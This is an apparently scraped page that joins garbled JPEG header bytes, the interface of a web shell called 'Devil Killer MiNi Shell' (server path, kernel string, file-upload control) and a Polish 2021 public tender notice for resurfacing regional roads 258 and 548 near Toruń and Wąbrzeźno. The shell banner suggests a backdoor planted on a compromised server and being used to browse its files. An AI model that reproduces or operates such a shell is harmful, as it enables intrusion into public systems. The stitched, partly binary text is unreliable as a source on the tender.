JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20211028/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20211028/0024981001-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Remont nawierzchni bitumicznych poprzez wymianę warstwy ścieralnej na drodze wojewódzkiej nr 258 administrowanej przez RDW Toruń oraz drodze wojewódzkiej nr 548 administrowanej przez RDW Wąbrzeźno </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Województwo Kujawsko - Pomorskie, Pl. Teatralny 2, 87-100 Toruń</span></h3> <h3 class="mb-0">1.3.) Oddział zamawiającego: <span class="normal">Zarząd Dróg Wojewódzkich, ul. Dworcowa 80, 85-010 Bydgoszcz</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">NIP 9561969536</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Dworcowa 80</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Bydgoszcz</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">85-010</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">kujawsko-pomorskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL613 - Bydgosko-toruński</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">56 688 13 73</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@zdw-bydgoszcz.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">http://bip.zdw-bydgoszcz.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> zarządzanie drogami </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Remont nawierzchni bitumicznych poprzez wymianę warstwy ścieralnej na drodze wojewódzkiej nr 258 administrowanej przez RDW Toruń oraz drodze wojewódzkiej nr 548 administrowanej przez RDW Wąbrzeźno </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-d28978a2-37dc-11ec-a3fb-0a24f8cd532c</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00249810</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-10-28</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00001873/18/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.59 Remont nawierzchni bitumicznych poprzez wymianę w-wy ścieralnej na DW 258</p> <p class="mb-0">1.1.60 Remont nawierzchni bitumicznych poprzez wymianę warstwy ścieralnej na DW 548</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 2 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://platformazakupowa.pl/transakcja/527190 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://platformazakupowa.pl/transakcja/527190</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">1.<br/>Komunikacja w postępowaniu o udzielenie zamówienia, w tym składanie ofert, wymiana informacji oraz<br/>przekazywanie dokumentów lub oświadczeń między Zamawiającym<br/>a Wykonawcą, z uwzględnieniem wyjątków określonych w ustawie, odbywa się przy użyciu środków<br/>komunikacji elektronicznej, o których mowa w ustawie z dnia 18 lipca 2002 r. o świadczeniu usług<br/>drogą elektroniczną (t.j. DZ. U. z 2020 r., poz. 344).<br/>2. W niniejszym postępowaniu ofertę oraz oświadczenie, o którym mowa w art. 125 ust. 1 ustawy Pzp<br/>(Załącznik nr 3 do SWZ), składa się, pod rygorem nieważności, w formie elektronicznej lub w postaci<br/>elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym w ogólnie dostępnych<br/>formatach danych, w szczególności w formatach *.pdf., *.doc., *.docx., *.xls., *.xlsx., *.jpg. (*.jpeg) z<br/>rekomendacją w formacie *.pdf.<br/>Komunikacja w postępowaniu odbywa się za pośrednictwem platformy zakupowej.<br/>3. W przypadku awarii platformy zakupowej, Zamawiający może również komunikować się<br/>z Wykonawcami za pośrednictwem poczty elektronicznej – email: rdw.wab@zdw-bydgoszcz.pl<br/>4. Regulamin korzystania z Platformy Zakupowej znajduje się pod adresem:<br/>https://platformazakupowa.pl/strona/1-regulamin<br/>5. Zamawiający informuje, że instrukcje korzystania z Platformy Zakupowej dotyczące w szczególności logowania, pobrania dokumentacji, składania wniosków o wyjaśnienie treści SWZ,<br/>składania ofert oraz innych czynności podejmowanych w niniejszym postępowaniu przy użyciu<br/>Platformy Zakupowej znajdują się w zakładce „Instrukcje dla Wykonawców&#34; na stronie<br/>https://platformazakupowa.pl/strona/45-instrukcje<br/>6. Minimalne wymagania techniczne umożliwiające korzystanie ze strony internetowej prowadzonego<br/>postępowania: przeglądarka internetowa Internet Explorer (minimalnie wersja 10.0), Google Chrome i<br/>Mozilla Firefox w najnowszej dostępnej wersji, z włączoną obsługą języka Javascript, akceptująca pliki<br/>typu „cookies” oraz łącze internetowe o przepustowości co najmniej 256 kbit/s. internetowej<br/>prowadzonego postępowania jest zoptymalizowana dla minimalnej rozdzielczości ekranu 1024x768<br/>pikseli.<br/>7. Uwaga! Zalecenia:<br/>Formaty plików wykorzystywanych przez Wykonawców powinny być zgodne<br/>z Rozporządzeniem Rady Ministrów z dnia 12 kwietnia 2012 r. w sprawie Krajowych Ram<br/>Interoperacyjności, minimalnych wymagań dla rejestrów publicznych i wymiany informacji w postaci<br/>elektronicznej oraz minimalnych wymagań dla systemów teleinformatycznych (Dz. U. z 2017 r., poz,.<br/>2247 z późn. zm.).<br/>1) Zamawiający rekomenduje wykorzystanie formatów *.pdf, *.doc, *.docx, *.xls, *.xlsx, *.jpg (*.jpeg), ze<br/>szczególnym wskazaniem na *.pdf.<br/>2) W celu ewentualnej kompresji danych Zamawiający rekomenduje wykorzystanie jednego z<br/>formatów: .zip, .7Z.<br/>3) Wśród formatów powszechnych a NIE występujących w Rozporządzeniu występują *.rar, *.gif,<br/>*.bmp. Oferty złożone w takich plikach zostaną uznane za złożone nieskutecznie.<br/>4) Ze względu na niskie ryzyko naruszenia integralności pliku oraz łatwiejszą weryfikację podpisu,<br/>Zamawiający zaleca, w miarę możliwości, przekonwertowanie plików składających się na ofertę na<br/>format *.pdf i opatrzenie podpisem kwalifikowanym PAdES.<br/>5) Pliki w innych formatach niż PDF zaleca się opatrzyć zewnętrznym podpisem XAdES. Wykonawca<br/>powinien pamiętać, aby plik z podpisem przekazywać łącznie<br/>z dokumentem podpisanym.<br/>6) Nie należy wprowadzać jakichkolwiek zmian w plikach po podpisaniu ich podpisem kwalifikowanym.<br/>Może to skutkować naruszeniem integralności plików<br/>co równoznaczne będzie z koniecznością odrzucenia oferty w postępowaniu.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 rozporządzenia Parlamentu<br/>Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w<br/>związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz<br/>uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE L 119 z<br/>04.05.2016, str. 1), dalej „RODO”, informuję, że:<br/>1. Administratorem Pani/Pana danych osobowych jest Zarząd Dróg Wojewódzkich w Bydgoszczy, ul.<br/>Dworcowa 80, 85-010 Bydgoszcz, tel. 52 37 05 713,<br/>e-mail: sekretariat@zdw-bydgoszcz.pl.<br/>2. Jeżeli ma Pani/Pan pytania dotyczące sposobu i zakresu przetwarzania Pani/Pana danych<br/>osobowych w związku z udzieleniem lub wykonywaniem zamówienia publicznego, a także<br/>przysługujących Pani/Panu uprawnień, może Pani/Pan skontaktować się z Inspektorem Ochrony<br/>Danych Zarządu Dróg Wojewódzkich w Bydgoszczy, ul. Dworcowa 80, 85-010 Bydgoszcz, tel. 52 37<br/>05 733, e-mail: iod@zdw-bydgoszcz.pl<br/>3. Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. c RODO w celu<br/>związanym z postępowaniem o udzielenie niniejszego zamówienia publicznego.<br/>4. Odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania na podstawie przepisów ustawy z dnia 11 września 2019 r. Prawo<br/>zamówień publicznych (Dz. U. z 2021 r. poz. 1129 z późn. zm.)<br/>5. Pani/Pana dane osobowe będą przechowywane, przez okres 4 lat od dnia zakończenia<br/>postępowania o udzielenie zamówienia, a jeżeli czas trwania umowy przekracza 4lata, okres<br/>przechowywania obejmuje cały czas trwania umowy oraz w celu archiwizacji.<br/>6. Obowiązek podania przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest<br/>wymogiem ustawowym określonym w przepisach ustawy Pzp, związanym z udziałem w postępowaniu<br/>o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z<br/>ustawy Pzp.<br/>7. W odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób<br/>zautomatyzowany, stosowanie do art. 22 RODO.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">8. Posiada Pani/Pan:<br/>1) na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;<br/>2) na podstawie art. 16 RODO prawo do sprostowania Pani/Pana danych osobowych ;<br/>3) na podstawie art. 18 RODO prawo żądania od administratora ograniczenia przetwarzania danych<br/>osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO ;<br/>4) prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan,<br/>że przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO;<br/>9. Nie przysługuje Pani/Panu:<br/>1) w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;<br/>2) prawo do przenoszenia danych osobowych, o którym mowa w art. 20 RODO;<br/>3) na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">O2.N4.361.14.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.5.) Łączna wartość poszczególnych części zamówienia: <span class="normal"> 470825,59 EUR </span> </h3> <h3 class="mb-0">4.1.6.) Wartość zamówienia stanowiącego przedmiot tego postępowania (bez VAT): <span class="normal"> 0 EUR </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.9.) Liczba części: <span class="normal">2</span></h3> <h3 class="mb-0">4.1.10.) Ofertę można składać na wszystkie części</h3> <h3 class="mb-0">4.1.11.) Zamawiający ogranicza liczbę części zamówienia, którą można udzielić jednemu wykonawcy: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="p-2 mt-4 bg-light">Część 1</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 2.	Szczegółowy zakres i zasady wykonywania robót określają:<br/>- Wzór umowy (Załącznik nr 4 do SWZ)<br/>- Opis przedmiotu zamówienia (Załącznik nr 8 do SWZ)<br/>- Specyfikacje Techniczne Wykonania i Odbioru Robót Budowlanych (Załącznik nr 7 do SWZ).<br/>3.	Przewidywane ilości prac określone w załączniku 2a-2b do SWZ są ilościami szacunkowymi, przyjętymi przez Zamawiającego wyłącznie w celu obliczenia przez Wykonawcę ceny oferty i wskazania przewidywanych, orientacyjnych potrzeb w zakresie asortymentu. Rzeczywista ilość i rodzaj zlecanych robót budowlanych będzie wynikała z faktycznych potrzeb Zamawiającego, przy czym maksymalna wartość zamówienia (umowy) nie przekroczy kwoty, którą Zamawiający zamierza przeznaczyć na sfinansowanie przedmiotu zamówienia i do tej kwoty będzie realizowany przedmiot zamówienia tj.:<br/>Część zamówienia nr 1 – dotyczy drogi wojewódzkiej nr 258 administrowanej przez RDW Toruń: 726 815,36 zł brutto; </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 230571,06 EUR </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233140-2 - Roboty drogowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">18 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Informacja o przewidywanych zamówieniach, o których mowa w art. 214 ust. 1 pkt 7<br/>ustawy Pzp<br/>Zgodnie z art. 214 ust. 1 pkt 7 ustawy Pzp Zamawiający przewiduje udzielanie zamówienia, jednakże w<br/>wysokości nie większej niż 50% wartości zamówienia podstawowego dla każdej części zamówienia, w<br/>przypadku wcześniejszego wyczerpania kwoty umownego wynagrodzenia Wykonawcy lub w<br/>przypadku, gdy pozostała do wykorzystania kwota wynagrodzenia będzie niewystarczająca do zlecenia<br/>robót budowlanych objętych przedmiotem umowy.<br/>Udzielenie zamówień, o których mowa w art. 214 ust. 1 pkt 7 ustawy Pzp, będzie polegać na<br/>powtórzeniu tego samego zakresu zamówienia, przy użyciu takiej samej ilości sprzętu co w zadaniu,<br/>którego dotyczy umowa podstawowa. Przy udzielaniu tych zamówień, wszystkie wymagania zawarte w<br/>SWZ wraz załącznikami dotyczyć będą także realizacji zamówienia w ramach art. 214 ust. 1 pkt 7<br/>ustawy Pzp.<br/>Warunkiem udzielenia zamówień, o których mowa w zdaniu pierwszym jest posiadanie środków<br/>finansowych na ich wykonanie. Na okoliczność ich wystąpienia, zostanie zawarta umowa w trybie<br/>zamówienia z wolnej ręki.</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Kryteria i zasady oceny ofert<br/>1. Zamawiający będzie oceniał oferty nieodrzucone według następujących kryteriów:<br/>Nr: Nazwa kryterium: Waga:<br/>1 Cena (Pc) 60%<br/>2 Czas wykonania robót (Pt) 40%<br/>2. Zasady oceny ofert w poszczególnych kryteriach:<br/>Nr kryterium Wzór:<br/>1 CENA<br/>Pc = (Oferta z najniższą ceną/Oferta oceniana) x 60 pkt<br/>Kryterium „Cena” będzie rozpatrywane na podstawie ceny brutto za wykonanie przedmiotu<br/>zamówienia, podanej przez Wykonawcę w Formularzu oferty. Zamawiający ofercie o najniższej cenie<br/>przyzna 60 punktów, a każdej następnej zostanie przyporządkowana liczba punktów proporcjonalnie<br/>mniejsza obliczona wg wzoru powyżej.<br/>2 CZAS WYKONANIA ROBÓT<br/>Pt = max. 40 pkt<br/>Kryterium „Czas wykonania robót” będzie rozpatrywane na podstawie zadeklarowanego w formularzu<br/>oferty czasu wykonania robót budowlanych. Przez czas wykonania robót rozumie się liczbę dni kalendarzowych jaka upłynie od dnia zawarcia<br/>umowy do dnia zgłoszenia Zamawiającemu zakończenia wykonywania przedmiotu zamówienia.<br/>Maksymalny czas wykonania robót wymagany przez Zamawiającego nie może być dłuższy niż 18 dni.<br/>Punkty w tym kryterium zostaną przydzielone w następujący sposób:<br/>1) zaoferowanie 18 dni czasu wykonywania robót – 0 pkt;<br/>2) zaoferowanie 16 dni czasu wykonywania robót – 15 pkt;<br/>3) zaoferowanie 14 dni czasu wykonywania robót – 40 pkt;<br/>Wykonawca, który zaoferuje czas wykonania robót krótszy niż 14 dni – otrzyma 40 pkt, a do umowy<br/>zostanie przyjęty czas wykonania robót wynoszący 14 dni.<br/>Wykonawca, który zaoferuje czas wykonania robót pomiędzy okresami wskazanymi powyżej tj.<br/>pomiędzy 14 a 16 lub 16 a 18 dni - do umowy zostanie przyjęty czas wykonania robót dłuższy<br/>wynoszący odpowiednio 16 lub 18 dni i zostanie przyznana odpowiednia ilość punktów w zależności od<br/>przyjętej ilości dni.<br/>Jeśli Wykonawca w formularzu oferty wykaże okres dłuższy niż 18 dni lub nie wykaże żadnego okresu,<br/>a z innych dokumentów nie będzie wynikało, że nastąpiła omyłka, oferta zostanie odrzucona, zgodnie z<br/>art. 226 ust. 1 pkt 5) ustawy Pzp.<br/>3. Za najkorzystniejszą zostanie wybrana oferta, która zgodnie z powyższymi kryteriami oceny ofert<br/>uzyska najwyższą sumę punktów Pc + Pt spośród ofert nie podlegających odrzuceniu.<br/>4. Jeżeli nie można wybrać najkorzystniejszej oferty z uwagi na to, że dwie lub więcej ofert przedstawia<br/>taki sam bilans ceny i innych kryteriów oceny ofert, Zamawiający wybiera spośród tych ofert ofertę,<br/>która otrzymała najwyższą ocenę w kryterium o najwyższej wadze.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">inne.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Czas wykonania robót</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 2</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 2. Szczegółowy zakres i zasady wykonywania robót określają:<br/>- Wzór umowy (Załącznik nr 4 do SWZ)<br/>- Opis przedmiotu zamówienia (Załącznik nr 8 do SWZ)<br/>- Specyfikacje Techniczne Wykonania i Odbioru Robót Budowlanych (Załącznik nr 7 do SWZ).<br/>3. Przewidywane ilości prac określone w załączniku 2a-2b do SWZ są ilościami szacunkowymi,<br/>przyjętymi przez Zamawiającego wyłącznie w celu obliczenia przez Wykonawcę ceny oferty i<br/>wskazania przewidywanych, orientacyjnych potrzeb w zakresie asortymentu. Rzeczywista ilość i<br/>rodzaj zlecanych robót budowlanych będzie wynikała z faktycznych potrzeb Zamawiającego,<br/>przy czym maksymalna wartość zamówienia (umowy) nie przekroczy kwoty, którą Zamawiający zamierza przeznaczyć na sfinansowanie przedmiotu zamówienia i do tej kwoty będzie<br/>realizowany przedmiot zamówienia tj.:<br/>Część zamówienia nr 2 – dotyczy drogi wojewódzkiej nr 548 administrowanej przez RDW<br/>Wąbrzeźno: 841 089,31 zł brutto; </p> <h3 class="mb-0">4.2.5.) Wartość części: <span class="normal"> 240254,43 EUR </span> </h3> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45233140-2 - Roboty drogowe</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">18 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.2.14.) Przedmiot, wielkość lub zakres oraz warunki zamówień na podobne usługi lub roboty budowlane <span class="normal">Informacja o przewidywanych zamówieniach, o których mowa w art. 214 ust. 1 pkt 7<br/>ustawy Pzp<br/>Zgodnie z art. 214 ust. 1 pkt 7 ustawy Pzp Zamawiający przewiduje udzielanie zamówienia, jednakże w<br/>wysokości nie 